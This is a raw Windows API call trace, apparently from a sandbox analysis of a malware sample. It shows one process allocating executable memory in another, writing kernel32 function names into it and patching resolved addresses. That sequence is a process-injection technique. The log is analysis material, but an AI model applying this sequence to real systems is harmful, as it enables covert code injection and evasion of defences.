	[0187.739] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.740] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.740] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.740] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.740] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.740] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055144, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.740] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.740] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.740] lstrlenA (lpString="GetExitCodeThread") returned 17
	[0187.740] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.741] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6bc8*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6bc8*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0187.741] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.741] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.741] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.741] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.741] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.742] ResetEvent (hEvent=0x478) returned 1
	[0187.742] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.742] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.742] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.742] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.742] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.742] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055148, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.743] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.743] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.743] lstrlenA (lpString="lstrcmpA") returned 8
	[0187.743] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.743] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6bbc*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6bbc*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.743] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.743] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.743] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.743] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.744] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.744] ResetEvent (hEvent=0x478) returned 1
	[0187.744] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.744] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.744] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.744] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.744] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005514c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.745] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.745] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.745] lstrlenA (lpString="lstrlenA") returned 8
	[0187.745] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.745] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6bb0*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6bb0*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.745] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.746] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.746] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.746] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.746] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.746] ResetEvent (hEvent=0x478) returned 1
	[0187.746] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.747] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.747] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.747] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.747] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.747] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055150, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.747] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.747] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.747] lstrlenA (lpString="DeleteCriticalSection") returned 21
	[0187.747] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.747] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b98*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b98*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0187.748] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.748] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.748] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.748] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.749] ResetEvent (hEvent=0x478) returned 1
	[0187.749] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.749] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.749] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.749] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.749] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.749] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055154, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.749] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.750] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.750] lstrlenA (lpString="InitializeCriticalSection") returned 25
	[0187.750] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.750] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b7c*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b7c*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0187.750] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.750] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.750] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.751] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.751] ResetEvent (hEvent=0x478) returned 1
	[0187.751] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.751] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.751] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.751] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.751] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.751] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055158, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.752] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.752] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.752] lstrlenA (lpString="LeaveCriticalSection") returned 20
	[0187.752] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.752] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b64*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b64*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0187.752] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.752] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.753] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.753] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.753] ResetEvent (hEvent=0x478) returned 1
	[0187.753] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.753] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.753] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.754] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.754] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.754] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005515c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.754] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.754] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.754] lstrlenA (lpString="EnterCriticalSection") returned 20
	[0187.754] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.754] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b4c*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b4c*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0187.755] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.755] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.755] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.755] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.755] ResetEvent (hEvent=0x478) returned 1
	[0187.755] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.756] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.756] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.756] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.756] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.756] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055160, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.756] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.756] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.756] lstrlenA (lpString="GetProcessHeap") returned 14
	[0187.757] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.757] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b3a*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b3a*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.757] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.757] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.757] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.757] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.757] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.758] ResetEvent (hEvent=0x478) returned 1
	[0187.758] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.758] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.758] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.758] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.758] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.758] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055164, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.759] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.759] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.759] lstrlenA (lpString="HeapAlloc") returned 9
	[0187.759] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.759] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b2e*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b2e*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0187.759] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.759] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.759] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.759] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.760] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.760] ResetEvent (hEvent=0x478) returned 1
	[0187.760] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.760] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.760] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.761] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.761] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055168, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.761] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.761] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.761] lstrlenA (lpString="HeapSize") returned 8
	[0187.761] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.761] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6b22*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6b22*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.762] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.762] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.762] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.762] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.762] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.763] ResetEvent (hEvent=0x478) returned 1
	[0187.763] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.763] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.763] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.763] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.763] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.763] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005516c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.763] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.764] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.764] lstrlenA (lpString="HeapValidate") returned 12
	[0187.764] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
